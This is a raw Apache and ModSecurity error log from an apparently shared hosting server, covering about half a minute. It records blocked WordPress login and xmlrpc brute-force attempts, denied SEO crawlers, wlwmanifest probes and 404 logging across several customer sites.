[Tue May 26 16:02:52.033498 2026] [security2:error] [pid 762634:tid 762879] [client 114.119.156.232:28485] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/omr/520190710.pdf"] [unique_id "ahV21Lx8rj1VZMqUAOd82QAAAHM"]
[Tue May 26 16:02:52.117784 2026] [security2:error] [pid 762634:tid 762870] [client 103.44.52.196:60506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV207x8rj1VZMqUAOd80gAAAGo"]
[Tue May 26 16:02:52.117941 2026] [security2:error] [pid 762634:tid 762870] [client 103.44.52.196:60506] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV207x8rj1VZMqUAOd80gAAAGo"]
[Tue May 26 16:02:52.192402 2026] [security2:error] [pid 762634:tid 762846] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV207x8rj1VZMqUAOd8zgAAAFI"]
[Tue May 26 16:02:53.534613 2026] [security2:error] [pid 762634:tid 762765] [client 103.153.130.62:57339] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV21bx8rj1VZMqUAOd8-wAAAAE"]
[Tue May 26 16:02:53.534735 2026] [security2:error] [pid 762634:tid 762765] [client 103.153.130.62:57339] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV21bx8rj1VZMqUAOd8-wAAAAE"]
[Tue May 26 16:02:54.434276 2026] [security2:error] [pid 762634:tid 762799] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV21bx8rj1VZMqUAOd9CgAAACM"]
[Tue May 26 16:02:56.497573 2026] [security2:error] [pid 762634:tid 762875] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV22Lx8rj1VZMqUAOd9QQAAAG8"]
[Tue May 26 16:02:57.637012 2026] [security2:error] [pid 762634:tid 762808] [client 62.60.130.182:54388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV22bx8rj1VZMqUAOd9aAAAACw"]
[Tue May 26 16:02:58.198810 2026] [security2:error] [pid 762634:tid 762865] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV22bx8rj1VZMqUAOd9dAAAAGU"]
[Tue May 26 16:02:58.481428 2026] [security2:error] [pid 762634:tid 762875] [client 62.60.130.182:55579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV22rx8rj1VZMqUAOd9hQAAAG8"]
[Tue May 26 16:03:00.273698 2026] [autoindex:error] [pid 762634:tid 762885] [client 43.157.95.131:54522] AH01276: Cannot serve directory /home1/dprlky8f/dprassurance.lk/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:03:00.496138 2026] [security2:error] [pid 762634:tid 762829] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV23Lx8rj1VZMqUAOd9pAAAAEE"]
[Tue May 26 16:03:00.866643 2026] [security2:error] [pid 762634:tid 762802] [client 106.219.85.83:30969] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV23Lx8rj1VZMqUAOd9uAAAACY"]
[Tue May 26 16:03:00.866829 2026] [security2:error] [pid 762634:tid 762802] [client 106.219.85.83:30969] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV23Lx8rj1VZMqUAOd9uAAAACY"]
[Tue May 26 16:03:02.308643 2026] [security2:error] [pid 762634:tid 762822] [client 103.44.52.196:38190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV23rx8rj1VZMqUAOd92wAAADo"]
[Tue May 26 16:03:02.308771 2026] [security2:error] [pid 762634:tid 762822] [client 103.44.52.196:38190] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV23rx8rj1VZMqUAOd92wAAADo"]
[Tue May 26 16:03:02.596381 2026] [security2:error] [pid 762634:tid 762796] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV23rx8rj1VZMqUAOd92gAAACA"]
[Tue May 26 16:03:03.573347 2026] [security2:error] [pid 762634:tid 762669] [remote 46.62.185.67:33128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahV237x8rj1VZMqUAOd9-gAAWyI"]
[Tue May 26 16:03:03.881724 2026] [security2:error] [pid 762634:tid 762774] [client 103.153.130.62:57619] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV237x8rj1VZMqUAOd-AQAAAAo"]
[Tue May 26 16:03:03.881852 2026] [security2:error] [pid 762634:tid 762774] [client 103.153.130.62:57619] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV237x8rj1VZMqUAOd-AQAAAAo"]
[Tue May 26 16:03:04.592085 2026] [security2:error] [pid 762634:tid 762792] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV24Lx8rj1VZMqUAOd-CgAAABw"]
[Tue May 26 16:03:05.207937 2026] [security2:error] [pid 762634:tid 762675] [remote 209.145.62.147:45968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.62.145.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahV24bx8rj1VZMqUAOd-IgAAYCg"]
[Tue May 26 16:03:05.402352 2026] [security2:error] [pid 762634:tid 762821] [client 74.7.244.62:54428] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahV24bx8rj1VZMqUAOd-KQAAOSs"]
[Tue May 26 16:03:05.402384 2026] [security2:error] [pid 762634:tid 762821] [client 74.7.244.62:54428] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahV24bx8rj1VZMqUAOd-KQAAOSs"]
[Tue May 26 16:03:05.759130 2026] [security2:error] [pid 762634:tid 762875] [client 62.60.130.182:58791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV24bx8rj1VZMqUAOd-OQAAAG8"]
[Tue May 26 16:03:05.795124 2026] [security2:error] [pid 762634:tid 762863] [client 74.7.244.62:54438] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahV24bx8rj1VZMqUAOd-NwAAYzA"], referer: https://www.blog.jhonweb.com/robots.txt
[Tue May 26 16:03:05.838285 2026] [security2:error] [pid 762634:tid 762877] [client 74.7.241.184:43928] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahV24bx8rj1VZMqUAOd-OAAAcTI"]
[Tue May 26 16:03:06.825328 2026] [security2:error] [pid 762634:tid 762841] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV24rx8rj1VZMqUAOd-TQAAAE0"]
[Tue May 26 16:03:07.006706 2026] [security2:error] [pid 762634:tid 762777] [client 223.191.36.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV24rx8rj1VZMqUAOd-VAAAAA0"]
[Tue May 26 16:03:08.716894 2026] [security2:error] [pid 762634:tid 762822] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV25Lx8rj1VZMqUAOd-hwAAADo"]
[Tue May 26 16:03:10.618292 2026] [security2:error] [pid 762634:tid 762877] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV25rx8rj1VZMqUAOd-tgAAAHE"]
[Tue May 26 16:03:10.829402 2026] [security2:error] [pid 762634:tid 762797] [client 172.216.169.248:35966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 248.169.216.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/news/wp-login.php/wp-login.php"] [unique_id "ahV25rx8rj1VZMqUAOd-twAAACE"]
[Tue May 26 16:03:11.542645 2026] [security2:error] [pid 762634:tid 762847] [client 106.219.85.83:25730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV257x8rj1VZMqUAOd-ygAAAFM"]
[Tue May 26 16:03:11.542776 2026] [security2:error] [pid 762634:tid 762847] [client 106.219.85.83:25730] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV257x8rj1VZMqUAOd-ygAAAFM"]
[Tue May 26 16:03:12.610369 2026] [security2:error] [pid 762634:tid 762692] [remote 195.250.23.247:57038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahV26Lx8rj1VZMqUAOd-9wAAWzk"]
[Tue May 26 16:03:12.858613 2026] [security2:error] [pid 762634:tid 762850] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV26Lx8rj1VZMqUAOd-9AAAAFY"]
[Tue May 26 16:03:12.888786 2026] [security2:error] [pid 762634:tid 762803] [client 103.44.52.196:45322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV26Lx8rj1VZMqUAOd_DQAAACc"]
[Tue May 26 16:03:12.888935 2026] [security2:error] [pid 762634:tid 762803] [client 103.44.52.196:45322] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV26Lx8rj1VZMqUAOd_DQAAACc"]
[Tue May 26 16:03:14.279607 2026] [security2:error] [pid 762634:tid 762888] [client 62.60.130.233:58260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.karuppuswamykovil.in"] [uri "/wp-login.php"] [unique_id "ahV26rx8rj1VZMqUAOd_KAAAAHw"], referer: https://duckduckgo.com/
[Tue May 26 16:03:14.619691 2026] [security2:error] [pid 762634:tid 762776] [client 62.60.130.233:62201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.karuppuswamykovil.in"] [uri "/wp-login.php"] [unique_id "ahV26rx8rj1VZMqUAOd_OQAAAAw"]
[Tue May 26 16:03:14.801131 2026] [security2:error] [pid 762634:tid 762881] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV26rx8rj1VZMqUAOd_MgAAAHU"]
[Tue May 26 16:03:14.966484 2026] [security2:error] [pid 762634:tid 762885] [client 103.153.130.62:57921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV26rx8rj1VZMqUAOd_SAAAAHk"]
[Tue May 26 16:03:14.966597 2026] [security2:error] [pid 762634:tid 762885] [client 103.153.130.62:57921] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV26rx8rj1VZMqUAOd_SAAAAHk"]
[Tue May 26 16:03:16.910568 2026] [security2:error] [pid 762634:tid 762780] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV27Lx8rj1VZMqUAOd_eAAAABA"]
[Tue May 26 16:03:16.914684 2026] [security2:error] [pid 762634:tid 762829] [client 85.208.96.212:59016] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahV27Lx8rj1VZMqUAOd_iAAAAEE"]
[Tue May 26 16:03:16.914842 2026] [security2:error] [pid 762634:tid 762829] [client 85.208.96.212:59016] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahV27Lx8rj1VZMqUAOd_iAAAAEE"]
[Tue May 26 16:03:18.373325 2026] [security2:error] [pid 762634:tid 762889] [client 18.183.129.171:49538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.129.183.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/xmlrpc.php"] [unique_id "ahV27rx8rj1VZMqUAOd_rwAAAH0"]
[Tue May 26 16:03:18.373490 2026] [security2:error] [pid 762634:tid 762889] [client 18.183.129.171:49538] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "jkjuice.taotechservices.com"] [uri "/xmlrpc.php"] [unique_id "ahV27rx8rj1VZMqUAOd_rwAAAH0"]
[Tue May 26 16:03:18.385711 2026] [security2:error] [pid 762634:tid 762891] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV27bx8rj1VZMqUAOd_qAAAAH8"]
[Tue May 26 16:03:19.789865 2026] [security2:error] [pid 762634:tid 762851] [client 31.57.184.107:52314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.movehostel.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahV277x8rj1VZMqUAOd_ywAAAFc"]
[Tue May 26 16:03:21.110678 2026] [security2:error] [pid 762634:tid 762778] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV28Lx8rj1VZMqUAOd_7QAAAA4"]
[Tue May 26 16:03:22.038259 2026] [security2:error] [pid 762634:tid 762862] [client 106.219.85.83:25636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV28rx8rj1VZMqUAOeAHwAAAGI"]
[Tue May 26 16:03:22.038351 2026] [security2:error] [pid 762634:tid 762862] [client 106.219.85.83:25636] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV28rx8rj1VZMqUAOeAHwAAAGI"]
[Tue May 26 16:03:22.987041 2026] [security2:error] [pid 762634:tid 762881] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV28rx8rj1VZMqUAOeAMAAAAHU"]
[Tue May 26 16:03:23.335005 2026] [security2:error] [pid 762634:tid 762876] [client 172.224.240.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV28bx8rj1VZMqUAOeAFQAAAHA"]
[Tue May 26 16:03:23.760315 2026] [security2:error] [pid 762634:tid 762828] [client 103.44.52.196:51776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV287x8rj1VZMqUAOeAVAAAAEA"]
[Tue May 26 16:03:23.760574 2026] [security2:error] [pid 762634:tid 762828] [client 103.44.52.196:51776] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV287x8rj1VZMqUAOeAVAAAAEA"]
[Tue May 26 16:03:24.053867 2026] [security2:error] [pid 762634:tid 762813] [client 2.58.56.163:52806] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahV29Lx8rj1VZMqUAOeAawAAADE"]
[Tue May 26 16:03:24.547205 2026] [security2:error] [pid 762634:tid 762881] [client 2.58.56.163:52954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pronumbers.com.au"] [uri "/xmlrpc.php"] [unique_id "ahV29Lx8rj1VZMqUAOeAdQAAAHU"]
[Tue May 26 16:03:24.793816 2026] [security2:error] [pid 762634:tid 762848] [client 103.153.130.62:58204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV29Lx8rj1VZMqUAOeAfAAAAFQ"]
[Tue May 26 16:03:24.793939 2026] [security2:error] [pid 762634:tid 762848] [client 103.153.130.62:58204] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV29Lx8rj1VZMqUAOeAfAAAAFQ"]
[Tue May 26 16:03:24.981842 2026] [security2:error] [pid 762634:tid 762778] [client 2.58.56.163:53048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV29Lx8rj1VZMqUAOeAhwAAAA4"]
[Tue May 26 16:03:25.081991 2026] [security2:error] [pid 762634:tid 762779] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV29Lx8rj1VZMqUAOeAewAAAA8"]
